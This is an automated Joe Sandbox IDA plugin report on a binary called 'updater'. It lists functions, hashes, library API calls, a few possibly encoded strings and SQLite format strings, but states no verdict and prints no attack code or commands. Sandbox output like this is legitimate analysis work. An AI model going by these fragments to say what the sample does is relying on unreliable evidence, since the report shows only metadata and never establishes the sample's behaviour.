Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 34f27f55e1a2b42e1c59b039d87829a6a8cd5bfcd8e78ac014244e0db300e8e5
Instruction ID: e3d80d5056c40cfbf240af51386af50627b6ac7081f321d65368ff2a24b71337
Opcode Fuzzy Hash: 34f27f55e1a2b42e1c59b039d87829a6a8cd5bfcd8e78ac014244e0db300e8e5
Instruction Fuzzy Hash: 24113031600515BFDB15DF29C844ADABBA9FF44664F008119EA5897A90EB30F960DFD0

Uniqueness

Uniqueness Score: -1.00%

Function 013CFF77 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 013B128D

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::exception::exception
String ID:
API String ID: 2807920213-0
Opcode ID: 539c9f1cf03f102ca9c522d3a911c2c9057d06df3dce8d1a654d2a3a357df755
Instruction ID: 725d957743975c1b91e5f2adbc14fb14503847ec3c58bd1c13149eb6c28008e4
Opcode Fuzzy Hash: 539c9f1cf03f102ca9c522d3a911c2c9057d06df3dce8d1a654d2a3a357df755
Instruction Fuzzy Hash: F4F07D7240021E67C718BFAAFC11CDE7B9C9F60A68740013EFA1887650EB31ED0583D4

Uniqueness

Uniqueness Score: -1.00%

Function 01420C90 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 01420CCA

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 292da03f80fd80fd00c05cea0df78b6dbe00427e473a65a05a15826fa6fae68b
Instruction ID: d0fd7b6a81dbf4c929c6043c367ef2fce3ad0c324035c27c78dd6d8770d44da4
Opcode Fuzzy Hash: 292da03f80fd80fd00c05cea0df78b6dbe00427e473a65a05a15826fa6fae68b
Instruction Fuzzy Hash: 55113971A0420AAFCF05DF58E94099F7BF9EF48304F15406AF809EB351D630EA11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01428DE8 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 014200C6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0142063D,00000001,00000364,00000005,000000FF,?,?,01413CA9,01420149,?,?,0141DA9C), ref: 01420107

_free.LIBCMT ref: 01428E57

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: deb1c0a4bcfdfdda9140dc86cca0d54468f7f47de27033a236988258eda4d6b1
Instruction ID: c0334492b4000e91e5e382ff5b07ad137ba247f9f9e7dd736483f5b3dcff50f1
Opcode Fuzzy Hash: deb1c0a4bcfdfdda9140dc86cca0d54468f7f47de27033a236988258eda4d6b1
Instruction Fuzzy Hash: 4E0122B2600327ABC3318FA9D88099EFBD8EB147B0F50062EE545B76D0E77068518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 014152C7 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__alldvrm.LIBCMT ref: 0141532F

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: __alldvrm
String ID:
API String ID: 65215352-0
Opcode ID: 0460f07f0d12403b60dde8756b98344bfb9af85e1b97c0701680bafdc2b72f66
Instruction ID: 9f2de801ad83023b396b84c18e93278d38af0bbbdffbb57237e83b350aa6e528
Opcode Fuzzy Hash: 0460f07f0d12403b60dde8756b98344bfb9af85e1b97c0701680bafdc2b72f66
Instruction Fuzzy Hash: 2C01D872910204BFEF24DF65C845BEEB7ECFBA1229F11855EE406AB214D270AA04CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0141314E Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ca8e9e532a719df361b6c9cb492d982898333f57b032a82f79c94fe4b91144b
Instruction ID: fd51ed430a17f36aef439a5aec6663aed34ef0e4265179784ea18a8fd61788c0
Opcode Fuzzy Hash: 7ca8e9e532a719df361b6c9cb492d982898333f57b032a82f79c94fe4b91144b
Instruction Fuzzy Hash: F8F028326006216EE6217E3BDC00B6B36B8AF72B70F14071BE868932F4DB34D446C6A5

Uniqueness

Uniqueness Score: -1.00%

Function 0142C3EE Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0142C451

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5c2e12cd716acd2ee769000e0b8b80a9b3a91afc9e7156e1fe6f41a9e9f94f89
Instruction ID: 758a70d237afd73fc9add3a0c642e919adf80ab6774a7e2290f408484876c132
Opcode Fuzzy Hash: 5c2e12cd716acd2ee769000e0b8b80a9b3a91afc9e7156e1fe6f41a9e9f94f89
Instruction Fuzzy Hash: 89014472C00169BFCF01AFE98C019FF7FB5AF28250F544166F914E21A0E6318A60DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 014200C6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0142063D,00000001,00000364,00000005,000000FF,?,?,01413CA9,01420149,?,?,0141DA9C), ref: 01420107

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 89568740781d3c69253b888ba92ba3887611cc57bcd92f872f7ea4f2034fc23f
Instruction ID: 9d1723b38d8ed2e2b09392e47caa8f8019866e824908e1b8fedef5c0f4e95664
Opcode Fuzzy Hash: 89568740781d3c69253b888ba92ba3887611cc57bcd92f872f7ea4f2034fc23f
Instruction Fuzzy Hash: 9CF0247250023466BB315A3AAC44B6BBBC8DF51670B588017F908A72B9DA70D4C282A0

Uniqueness

Uniqueness Score: -1.00%

Function 0140DC67 Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 013B128D

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::exception::exception
String ID:
API String ID: 2807920213-0
Opcode ID: 9a178c65e21abc146fcf6542ea49f1370340a625f573892f941509e5a7993f30
Instruction ID: 079790bc8affafb604f4d2a15ef4a91dcaa108dd5332f896a4bf7bebce8f17f0
Opcode Fuzzy Hash: 9a178c65e21abc146fcf6542ea49f1370340a625f573892f941509e5a7993f30
Instruction Fuzzy Hash: 4CF0F0B580430E72CB146AEAEC0489A7B5C8A206A8700413AEF188A9F0EB71D955C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 013B2B95 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013B2BAE

Part of subcall function 013F60E6: FindNextFileW.KERNEL32(?,?,?,013B2C78,?,?,?,?,?,?,?,?,00000000), ref: 013F60EF

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: FileFindNext___std_fs_directory_iterator_advance@8
String ID:
API String ID: 3878998205-0
Opcode ID: 1e3f53b99c73df3d8f3de25c2ac6dd250ce164a3f3b04e89b11d6b26aa243de7
Instruction ID: 134b2aff35c5f768e48c096fba61d7167db79c19613a52dd078dae41482fcca3
Opcode Fuzzy Hash: 1e3f53b99c73df3d8f3de25c2ac6dd250ce164a3f3b04e89b11d6b26aa243de7
Instruction Fuzzy Hash: 14F0BE312046094AEB28AA1DDD95BFBB7ACAF9031DF000A6D9B52D2840FEA0F840C650

Uniqueness

Uniqueness Score: -1.00%

Function 014121F8 Relevance: 1.5, APIs: 1, Instructions: 33libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?,01454064,00000000,?,0141234A,00000004,InitializeCriticalSectionEx,0143BC58,0143BC60,00000000,?,01412109,01454064,00000FA0,00000000), ref: 01412229

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: bbaa9ba63faa5aa9ffe44d8ce45386eb18232d6f6660b51321385a2b8fac4dd3
Instruction ID: 2b8dcd0d19a17c1bae38637fd259927a8e4810169b28c321976d096169412da1
Opcode Fuzzy Hash: bbaa9ba63faa5aa9ffe44d8ce45386eb18232d6f6660b51321385a2b8fac4dd3
Instruction Fuzzy Hash: 91F08C362002169BAF228FA9A900C9F7BA8AF097207240126EA04D72A8EB71D4208791

Uniqueness

Uniqueness Score: -1.00%

Function 0142255C Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0142838D,00000220,?,?,?,?,?,?,01413E8D,?), ref: 0142258E

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 82194d3cedc8a9c0663ab415db81ff5b7eebe544ce88c2c971e16b791c85a9ca
Instruction ID: 9de3b22ac9ae2fc672270af5d8367e6a8363d28669370aef1a6718c062a39b54
Opcode Fuzzy Hash: 82194d3cedc8a9c0663ab415db81ff5b7eebe544ce88c2c971e16b791c85a9ca
Instruction Fuzzy Hash: 46E0EC7114123157E631156A4C20F5B7B489F551B1F854117ED0B962F4DAF4C8C281E5

Uniqueness

Uniqueness Score: -1.00%

Function 013B3139 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

___std_fs_copy_file@12.LIBCPMT ref: 013B315D

Part of subcall function 013B2966: __EH_prolog2.LIBCMT ref: 013B296D

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: H_prolog2___std_fs_copy_file@12
String ID:
API String ID: 1952593469-0
Opcode ID: 2ca224bd62a12594fcbb4fef358a29d57bc5e039242b6aa38988b2ac860f49b8
Instruction ID: a6ded08159911027bbc0ef0c62098bf680f4e2d4be896a6be987e176b36132a9
Opcode Fuzzy Hash: 2ca224bd62a12594fcbb4fef358a29d57bc5e039242b6aa38988b2ac860f49b8
Instruction Fuzzy Hash: F5E0D83172161163C225694D9C49A97B7BEBFC6A39B14022DEA1993680FF60A910C6F5

Uniqueness

Uniqueness Score: -1.00%

Function 013CDD77 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 013CDD8C

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 31dcf3dc1ad50d0894debbb5bd7d54a72b8730b25ea183235a8da2b72f515047
Instruction ID: 552decdfcd3e0d1b915b570ba527b0d5734bec9cbf40bc36d81288cf047f9301
Opcode Fuzzy Hash: 31dcf3dc1ad50d0894debbb5bd7d54a72b8730b25ea183235a8da2b72f515047
Instruction Fuzzy Hash: 83D012310146108BE3248F58F54574577E5EF44729F10091ED081C2560DB79AD448794

Uniqueness

Uniqueness Score: -1.00%

Function 013CDF41 Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 013CDF50

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 5b52933b155fdb532d347984173775a0226bf495b6642164c653c436c958e7f8
Instruction ID: 0a53819d846762c1d7568e854bbc8e20632163320d71000cbcd59e7fd13f0dbc
Opcode Fuzzy Hash: 5b52933b155fdb532d347984173775a0226bf495b6642164c653c436c958e7f8
Instruction Fuzzy Hash: 11D05E320142018BF3346E18F0017627BE6EB00728F24091DE0D1C6591C7A95C888798

Uniqueness

Uniqueness Score: -1.00%

Function 0142C135 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0142C525,?,?,00000000), ref: 0142C152

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 34c883ff01ec69877c19532728b8879cfc3f2c84992c69e304ecb82233b98f55
Instruction ID: f3859b446557bcb4ff167f4e9ba5d41aa820fbd61b573fea6a9916305f428f68
Opcode Fuzzy Hash: 34c883ff01ec69877c19532728b8879cfc3f2c84992c69e304ecb82233b98f55
Instruction Fuzzy Hash: A9D06C7200010DBBDF128E84DD06EDA3FAAFB48714F014000BA5856020C732E821EB90

Uniqueness

Uniqueness Score: -1.00%

Function 01415640 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 01415653

Part of subcall function 01420123: HeapFree.KERNEL32(00000000,00000000), ref: 01420139
Part of subcall function 01420123: GetLastError.KERNEL32(?,?,0141DA9C), ref: 0142014B

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 8a682b33a536c5502f97d1a5cabba1255ece08263c3092e6da3b829fddb3085a
Instruction ID: cadcd43b2ba6e1226c90d5f9eab847463992994c9ae8c1144b819e1e51be6077
Opcode Fuzzy Hash: 8a682b33a536c5502f97d1a5cabba1255ece08263c3092e6da3b829fddb3085a
Instruction Fuzzy Hash: DEC08C31000208BBCB009B42C806A4E7BA8DB80264F200048F41017250CAB2EF409680

Uniqueness

Uniqueness Score: -1.00%

Function 013B7BE2 Relevance: 1.3, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000), ref: 013B7BF7

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: d996261578099ae32535d197810cc30230624f94e899abbc18f9c1e12a9a4887
Instruction ID: af0928b39e6842aa040e952daf2ebdc34ff955fffe4153dc92293e9532850106
Opcode Fuzzy Hash: d996261578099ae32535d197810cc30230624f94e899abbc18f9c1e12a9a4887
Instruction Fuzzy Hash: EBF0F830504F408FE732CA38E048792BAE0AB44619F040A2E93B286DA0E730E486CF00

Uniqueness

Uniqueness Score: -1.00%

Function 013F5D9C Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(000000FF), ref: 013F5DA8

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e929c7a616ffd28a28c43f620b157caf1892001914d69d0eb69886f1b4317940
Instruction ID: 5edb1513f8f98f38d607027609c4e65276835acad706b10ac08d7c1b913abea6
Opcode Fuzzy Hash: e929c7a616ffd28a28c43f620b157caf1892001914d69d0eb69886f1b4317940
Instruction Fuzzy Hash: B1C0127110660966D6305A5A980C5957A595B113657548229BB6C446F0DB31C4A6C550

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 013C2431 Relevance: 20.5, Strings: 16, Instructions: 451COMMON

Download Yara Rule

Strings

., xrefs: 013C215A
~O]], xrefs: 013C2364
., xrefs: 013C1D67
]YA\, xrefs: 013C2225
AZAM, xrefs: 013C1E97
., xrefs: 013C1DFC
`OCK, xrefs: 013C214D
~\AZ, xrefs: 013C1F3A
]]YA, xrefs: 013C22CA
AMAB, xrefs: 013C1F41
., xrefs: 013C2020
., xrefs: 013C2232
ZAMA, xrefs: 013C1D5A
., xrefs: 013C1F4E
ZAMA, xrefs: 013C1DEF
., xrefs: 013C2371

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionDeallocateVariableWake
String ID: .$.$.$.$.$.$.$AMAB$AZAM$ZAMA$ZAMA$]YA\$]]YA$`OCK$~O]]$~\AZ
API String ID: 1208101283-2674794497
Opcode ID: de032d1679c076c1f96adb67c99496db917e6f8d0ea5134202896b84b0ad92c1
Instruction ID: d92f03d55ce51e85898f28993411274a97dd29c489fafe08fdd73158d050565d
Opcode Fuzzy Hash: de032d1679c076c1f96adb67c99496db917e6f8d0ea5134202896b84b0ad92c1
Instruction Fuzzy Hash: 75023871D00246CECB25EFE9C844BEEBB71AF21718F24415EE4596F2A2DBB05D89CB40

Uniqueness

Uniqueness Score: -1.00%

Function 013D0B70 Relevance: 16.6, APIs: 5, Strings: 4, Instructions: 843COMMON

Download Yara Rule

Strings

+Inf, xrefs: 013D1339
NaN, xrefs: 013D126E
-Inf, xrefs: 013D132F, 013D1346
Inf, xrefs: 013D133E

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID: +Inf$-Inf$Inf$NaN
API String ID: 0-4067408017
Opcode ID: cd131b5fdd28d03d788f833782ae1b3fd5f5228e548fa0b3892292f565b08418
Instruction ID: f5fae88112860661f779f301980bf7390f2a9a4cccc4b2944b1fa6d5776b18f6
Opcode Fuzzy Hash: cd131b5fdd28d03d788f833782ae1b3fd5f5228e548fa0b3892292f565b08418
Instruction Fuzzy Hash: 2A62A272A1C7818FD72ACE3C945036BBBE5AFDA248F188A5EF4C997252D730C546C742

Uniqueness

Uniqueness Score: -1.00%

Function 013F1702 Relevance: 11.6, Strings: 8, Instructions: 1591COMMON

Download Yara Rule

Strings

%z VIRTUAL TABLE INDEX %d:%s, xrefs: 013F1BBD
:, xrefs: 013F1DAF
%z USING PRIMARY KEY, xrefs: 013F1B9F
%z ORDER BY, xrefs: 013F1BD5
%z WITH INDEX %s, xrefs: 013F1B85
%z AS %s, xrefs: 013F1B6D
L, xrefs: 013F1A46
